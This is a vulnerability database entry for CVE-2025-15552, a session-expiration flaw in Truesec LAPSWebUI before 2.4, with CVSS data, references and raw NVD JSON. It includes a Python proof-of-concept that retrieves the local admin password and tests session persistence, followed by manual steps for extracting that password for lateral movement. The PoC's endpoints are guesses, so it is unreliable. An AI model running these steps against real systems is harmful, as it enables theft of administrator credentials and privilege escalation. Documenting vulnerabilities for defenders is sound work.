CVE-2025-15552

Description

Insufficient Session Expiration in Truesec’s LAPSWebUI before version 2.4 allows an attacker with access to a workstation to escalate their privileges via disclosure of local admin password.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:truesec:lapswebui:*:*:*:*:*:*:*:* - VULNERABLE

Truesec LAPSWebUI < 2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15552 PoC - Truesec LAPSWebUI Session Exploitation
# This PoC demonstrates the session expiration vulnerability in LAPSWebUI < 2.4
# Reference: https://labs.reversec.com/advisories/2026/03/long-session-lifetime-in-truesec-lapswebui

import requests
import time
import sys
from datetime import datetime

def check_session_vulnerability(target_url):
    """
    Check if target LAPSWebUI is vulnerable to session expiration issue.
    """
    print(f"[*] Target: {target_url}")
    print(f"[*] Starting vulnerability check at {datetime.now()}")
    
    # Create a session to maintain cookies
    session = requests.Session()
    
    # Step 1: Initial authentication
    print("\n[1] Attempting initial authentication...")
    auth_data = {
        "username": "victim_user",
        "password": "user_password"
    }
    
    try:
        # Note: Adjust endpoint based on actual LAPSWebUI deployment
        auth_response = session.post(f"{target_url}/api/auth/login", json=auth_data, timeout=10)
        
        if auth_response.status_code == 200:
            print("[+] Authentication successful")
            print(f"[+] Session cookies obtained: {list(session.cookies.keys())}")
            
            # Step 2: Request local admin password
            print("\n[2] Requesting local admin password...")
            password_response = session.get(f"{target_url}/api/laps/password", timeout=10)
            
            if password_response.status_code == 200:
                admin_password = password_response.json().get('password')
                print(f"[+] Admin password retrieved: {admin_password}")
            
            # Step 3: Check session persistence (the vulnerability)
            print("\n[3] Testing session persistence (vulnerability check)...")
            print("[*] Waiting 60 seconds to check if session remains valid...")
            time.sleep(60)
            
            # Attempt to use the same session after delay
            delayed_response = session.get(f"{target_url}/api/laps/password", timeout=10)
            
            if delayed_response.status_code == 200:
                print("[!] VULNERABLE: Session remained active after 60 seconds")
                print("[!] This indicates insufficient session expiration")
                print(f"[!] Extended session allows privilege escalation via password disclosure")
                return True
            else:
                print("[+] Session properly expired")
                return False
                
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15552-poc.py <target_url>")
        print("Example: python cve-2025-15552-poc.py http://localhost:5000")
        sys.exit(1)
    
    target = sys.argv[1]
    vulnerable = check_session_vulnerability(target)
    
    if vulnerable:
        print("\n" + "="*60)
        print("RESULT: Target is VULNERABLE to CVE-2025-15552")
        print("Attack vector: Local workstation access with extended session")
        print("Impact: Local admin password disclosure leading to privilege escalation")
        print("="*60)
    elif vulnerable is False:
        print("\n[+] Target appears to be patched (session properly expires)")
    else:
        print("\n[-] Could not determine vulnerability status")

if __name__ == "__main__":
    main()

# Additional manual exploitation steps:
# 1. Attacker gains local access to workstation running LAPSWebUI
# 2. Open browser developer tools (F12)
# 3. Navigate to Application/Storage tab to examine session cookies
# 4. Check localStorage/sessionStorage for cached credentials
# 5. If session still active, make direct API calls to extract admin password
# 6. Use obtained password for lateral movement or full system compromise

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15552
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15552
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15552/
[4] VulDB https://vuldb.com/cve/CVE-2025-15552
[5] https://labs.reversec.com/advisories/2026/03/long-session-lifetime-in-truesec-lapswebui

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15552", "sourceIdentifier": "db4dfee8-a97e-4877-bfae-eba6d14a2166", "published": "2026-03-16T14:17:56.130", "lastModified": "2026-04-20T13:29:24.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient Session Expiration in Truesec’s LAPSWebUI before version 2.4 allows an attacker with access to a workstation to escalate their privileges via disclosure of local admin password."}, {"lang": "es", "value": "Expiración de sesión insuficiente en LAPSWebUI de Truesec anterior a la versión 2.4 permite a un atacante con acceso a una estación de trabajo escalar sus privilegios mediante la divulgación de la contraseña de administrador local."}], "metrics": {"cvssMetricV40": [{"source": "db4dfee8-a97e-4877-bfae-eba6d14a2166", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "db4dfee8-a97e-4877-bfae-eba6d14a2166", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:truesec:lapswebui:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4", "matchCriteriaId": "52616015-9CF6-4732-B4F7-A4246D3DE157"}]}]}], "references": [{"url": "https://labs.reversec.com/advisories/2026/03/long-session-lifetime-in-truesec-lapswebui", "source": "db4dfee8-a97e-4877-bfae-eba6d14a2166", "tags": ["Third Party Advisory"]}]}}